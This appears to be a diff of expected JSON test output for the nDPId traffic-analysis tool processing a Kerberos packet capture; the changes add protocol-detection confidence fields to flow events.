 00872{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":57,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":1,"flow_last_seen":1549337951638,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":369,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":369,"pkt_l4_len":335,"ts_msec":1549337951638,"pkt":"pB9ywglqAAgCHEeuCABFAAFjARFAAIAGj5KsEAjJrBAICMAkAFi0GLZOsNNMHlAYAQAvMAAAAAABN2qCATMwggEvoQMCAQWiAwIBCqNjMGEwTKEDAgECokUEQzBBoAMCARKiOgQ4Wndh9xw8qUUtso0vc8TuP9R5peLYlUKrIi93QkMXsrfVII\/B8UhLSOwTSHwq5LSHP2vURJP\/YpgwEaEEAgIAgKIJBAcwBaADAQH\/pIG9MIG6oAcDBQBAgQAQoRwwGqADAgEBoRMwERsPdGhlcmVzYS5qb2huc29uogwbCkhBUFBZQ1JBRlSjHzAdoAMCAQKhFjAUGwZrcmJ0Z3QbCkhBUFBZQ1JBRlSlERgPMjAzNzA5MTMwMjQ4MDVaphEYDzIwMzcwOTEzMDI0ODA1WqcGAgRd2\/xnqBUwEwIBEgIBEQIBFwIBGAIC\/3kCAQOpHTAbMBmgAwIBFKESBBBKT0hOU09OLVBDICAgICAg"}
-00691{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":57,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337951638,"flow_last_seen":1549337951638,"flow_idle_time":7440000,"flow_min_l4_payload_len":315,"flow_max_l4_payload_len":315,"flow_tot_l4_payload_len":315,"flow_avg_l4_payload_len":315,"midstream":1,"ts_msec":1549337951638,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49188,"dst_port":88,"l4_proto":"tcp","ndpi": {"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"","domain":"happycraft","username":"theresa.johnson"}}
+00717{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":57,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337951638,"flow_last_seen":1549337951638,"flow_idle_time":7440000,"flow_min_l4_payload_len":315,"flow_max_l4_payload_len":315,"flow_tot_l4_payload_len":315,"flow_avg_l4_payload_len":315,"midstream":1,"ts_msec":1549337951638,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49188,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"","domain":"happycraft","username":"theresa.johnson"}}
 00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":58,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":2,"flow_last_seen":1549337951638,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":216,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":216,"pkt_l4_len":182,"ts_msec":1549337951638,"pkt":"AAgCHEeupB9ywglqCABFAADKE9xAAIAGfWCsEAgIrBAIyQBYwCSw01HStBi3iVAYAQA+gAAAtgxIRqdE2xpJueUsyACfoBkRIO2d0vdWoZTH7\/Uq\/IekfUoxUBvBS550+iWChkmhJucRdY1OlQL1WMQC8uhxGdFWaESvp\/JzESFsbwdEK2JaAYNNrn2MyR4+4w4oYIB6xP3aoFYA9y5s01X0oEa\/3ePvjWb66V7pwZZYO9bc89yozmxDtVb4zCT8SyPCYGj7ljiOz9w+sICchbsKK+VkdLL4"}
 00571{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":59,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337951639,"flow_last_seen":1549337951639,"flow_idle_time":7440000,"flow_min_l4_payload_len":41,"flow_max_l4_payload_len":41,"flow_tot_l4_payload_len":41,"flow_avg_l4_payload_len":41,"midstream":1,"ts_msec":1549337951639,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49189,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00502{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":59,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":1,"flow_last_seen":1549337951639,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":95,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":95,"pkt_l4_len":61,"ts_msec":1549337951639,"pkt":"pB9ywglqAAgCHEeuCABFAABRARdAAIAGkJ6sEAjJrBAICMAlAFiRlp2kV2CH+1AYAQDPTQAAMzcwOTEzMDI0ODA1WqcGAgRd2\/xvqBIwEAIBEgIBEQIBFwIBGAIC\/3k="}
@@ -129,62 +133,62 @@
 00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1549337940432,"flow_last_seen":1549337940433,"flow_idle_time":7440000,"flow_min_l4_payload_len":220,"flow_max_l4_payload_len":359,"flow_tot_l4_payload_len":863,"flow_avg_l4_payload_len":287,"midstream":1,"ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49185,"dst_port":49155,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00575{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337929790,"flow_last_seen":1549337929790,"flow_idle_time":7440000,"flow_min_l4_payload_len":239,"flow_max_l4_payload_len":278,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":258,"midstream":1,"ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49157,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00575{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337929811,"flow_last_seen":1549337929812,"flow_idle_time":7440000,"flow_min_l4_payload_len":112,"flow_max_l4_payload_len":319,"flow_tot_l4_payload_len":431,"flow_avg_l4_payload_len":215,"midstream":1,"ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49158,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00664{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337929815,"flow_last_seen":1549337929815,"flow_idle_time":7440000,"flow_min_l4_payload_len":115,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":252,"flow_avg_l4_payload_len":126,"midstream":1,"ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49159,"dst_port":88,"l4_proto":"tcp","ndpi": {"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"","domain":"","username":""}}
+00700{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337929815,"flow_last_seen":1549337929815,"flow_idle_time":7440000,"flow_min_l4_payload_len":115,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":252,"flow_avg_l4_payload_len":126,"midstream":1,"ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49159,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"","domain":"","username":""}}
 00575{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337929815,"flow_last_seen":1549337929815,"flow_idle_time":7440000,"flow_min_l4_payload_len":115,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":252,"flow_avg_l4_payload_len":126,"midstream":1,"ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49159,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00654{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1549337929816,"flow_last_seen":1549337929816,"flow_idle_time":7440000,"flow_min_l4_payload_len":1431,"flow_max_l4_payload_len":1444,"flow_tot_l4_payload_len":2875,"flow_avg_l4_payload_len":1437,"midstream":1,"ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49160,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Kerberos","breed":"Acceptable","category":"Network"}}
-00664{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337929981,"flow_last_seen":1549337929983,"flow_idle_time":7440000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":153,"flow_tot_l4_payload_len":279,"flow_avg_l4_payload_len":139,"midstream":1,"ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49162,"dst_port":88,"l4_proto":"tcp","ndpi": {"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"","domain":"","username":""}}
+00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1549337929816,"flow_last_seen":1549337929816,"flow_idle_time":7440000,"flow_min_l4_payload_len":1431,"flow_max_l4_payload_len":1444,"flow_tot_l4_payload_len":2875,"flow_avg_l4_payload_len":1437,"midstream":1,"ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49160,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"}}
+00700{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337929981,"flow_last_seen":1549337929983,"flow_idle_time":7440000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":153,"flow_tot_l4_payload_len":279,"flow_avg_l4_payload_len":139,"midstream":1,"ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49162,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"","domain":"","username":""}}
 00575{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337929981,"flow_last_seen":1549337929983,"flow_idle_time":7440000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":153,"flow_tot_l4_payload_len":279,"flow_avg_l4_payload_len":139,"midstream":1,"ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49162,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00575{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337930192,"flow_last_seen":1549337930193,"flow_idle_time":7440000,"flow_min_l4_payload_len":239,"flow_max_l4_payload_len":278,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":258,"midstream":1,"ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49166,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00575{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337930214,"flow_last_seen":1549337930214,"flow_idle_time":7440000,"flow_min_l4_payload_len":112,"flow_max_l4_payload_len":319,"flow_tot_l4_payload_len":431,"flow_avg_l4_payload_len":215,"midstream":1,"ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49167,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00665{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337930217,"flow_last_seen":1549337930217,"flow_idle_time":7440000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":153,"flow_tot_l4_payload_len":279,"flow_avg_l4_payload_len":139,"midstream":1,"ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49168,"dst_port":88,"l4_proto":"tcp","ndpi": {"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"","domain":"","username":""}}
+00701{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337930217,"flow_last_seen":1549337930217,"flow_idle_time":7440000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":153,"flow_tot_l4_payload_len":279,"flow_avg_l4_payload_len":139,"midstream":1,"ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49168,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"","domain":"","username":""}}
 00576{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337930217,"flow_last_seen":1549337930217,"flow_idle_time":7440000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":153,"flow_tot_l4_payload_len":279,"flow_avg_l4_payload_len":139,"midstream":1,"ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49168,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00663{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337931198,"flow_last_seen":1549337931199,"flow_idle_time":7440000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":113,"flow_tot_l4_payload_len":181,"flow_avg_l4_payload_len":90,"midstream":1,"ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49170,"dst_port":88,"l4_proto":"tcp","ndpi": {"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"","domain":"","username":""}}
+00699{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337931198,"flow_last_seen":1549337931199,"flow_idle_time":7440000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":113,"flow_tot_l4_payload_len":181,"flow_avg_l4_payload_len":90,"midstream":1,"ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49170,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"","domain":"","username":""}}
 00574{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337931198,"flow_last_seen":1549337931199,"flow_idle_time":7440000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":113,"flow_tot_l4_payload_len":181,"flow_avg_l4_payload_len":90,"midstream":1,"ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49170,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00655{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1549337931210,"flow_last_seen":1549337931211,"flow_idle_time":7440000,"flow_min_l4_payload_len":1432,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":2884,"flow_avg_l4_payload_len":1442,"midstream":1,"ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49171,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Kerberos","breed":"Acceptable","category":"Network"}}
-00667{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337931211,"flow_last_seen":1549337931213,"flow_idle_time":7440000,"flow_min_l4_payload_len":136,"flow_max_l4_payload_len":1064,"flow_tot_l4_payload_len":1200,"flow_avg_l4_payload_len":600,"midstream":1,"ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49173,"dst_port":88,"l4_proto":"tcp","ndpi": {"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"","domain":"","username":""}}
+00681{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1549337931210,"flow_last_seen":1549337931211,"flow_idle_time":7440000,"flow_min_l4_payload_len":1432,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":2884,"flow_avg_l4_payload_len":1442,"midstream":1,"ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49171,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"}}
+00703{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337931211,"flow_last_seen":1549337931213,"flow_idle_time":7440000,"flow_min_l4_payload_len":136,"flow_max_l4_payload_len":1064,"flow_tot_l4_payload_len":1200,"flow_avg_l4_payload_len":600,"midstream":1,"ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49173,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"","domain":"","username":""}}
 00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337931211,"flow_last_seen":1549337931213,"flow_idle_time":7440000,"flow_min_l4_payload_len":136,"flow_max_l4_payload_len":1064,"flow_tot_l4_payload_len":1200,"flow_avg_l4_payload_len":600,"midstream":1,"ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49173,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00665{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337931218,"flow_last_seen":1549337931219,"flow_idle_time":7440000,"flow_min_l4_payload_len":115,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":252,"flow_avg_l4_payload_len":126,"midstream":1,"ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49175,"dst_port":88,"l4_proto":"tcp","ndpi": {"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"","domain":"","username":""}}
+00701{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337931218,"flow_last_seen":1549337931219,"flow_idle_time":7440000,"flow_min_l4_payload_len":115,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":252,"flow_avg_l4_payload_len":126,"midstream":1,"ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49175,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"","domain":"","username":""}}
 00576{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337931218,"flow_last_seen":1549337931219,"flow_idle_time":7440000,"flow_min_l4_payload_len":115,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":252,"flow_avg_l4_payload_len":126,"midstream":1,"ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49175,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00655{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1549337931219,"flow_last_seen":1549337931220,"flow_idle_time":7440000,"flow_min_l4_payload_len":1431,"flow_max_l4_payload_len":1444,"flow_tot_l4_payload_len":2875,"flow_avg_l4_payload_len":1437,"midstream":1,"ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49176,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Kerberos","breed":"Acceptable","category":"Network"}}
+00681{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1549337931219,"flow_last_seen":1549337931220,"flow_idle_time":7440000,"flow_min_l4_payload_len":1431,"flow_max_l4_payload_len":1444,"flow_tot_l4_payload_len":2875,"flow_avg_l4_payload_len":1437,"midstream":1,"ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49176,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"}}
 00576{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337937703,"flow_last_seen":1549337937703,"flow_idle_time":7440000,"flow_min_l4_payload_len":239,"flow_max_l4_payload_len":278,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":258,"midstream":1,"ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49181,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00576{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337937724,"flow_last_seen":1549337937724,"flow_idle_time":7440000,"flow_min_l4_payload_len":112,"flow_max_l4_payload_len":319,"flow_tot_l4_payload_len":431,"flow_avg_l4_payload_len":215,"midstream":1,"ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49182,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00662{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337937725,"flow_last_seen":1549337937726,"flow_idle_time":7440000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":80,"flow_tot_l4_payload_len":120,"flow_avg_l4_payload_len":60,"midstream":1,"ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49183,"dst_port":88,"l4_proto":"tcp","ndpi": {"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"","domain":"","username":""}}
+00698{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337937725,"flow_last_seen":1549337937726,"flow_idle_time":7440000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":80,"flow_tot_l4_payload_len":120,"flow_avg_l4_payload_len":60,"midstream":1,"ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49183,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"","domain":"","username":""}}
 00573{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337937725,"flow_last_seen":1549337937726,"flow_idle_time":7440000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":80,"flow_tot_l4_payload_len":120,"flow_avg_l4_payload_len":60,"midstream":1,"ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49183,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00665{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337940431,"flow_last_seen":1549337940432,"flow_idle_time":7440000,"flow_min_l4_payload_len":115,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":252,"flow_avg_l4_payload_len":126,"midstream":1,"ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49186,"dst_port":88,"l4_proto":"tcp","ndpi": {"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"","domain":"","username":""}}
+00701{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337940431,"flow_last_seen":1549337940432,"flow_idle_time":7440000,"flow_min_l4_payload_len":115,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":252,"flow_avg_l4_payload_len":126,"midstream":1,"ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49186,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"","domain":"","username":""}}
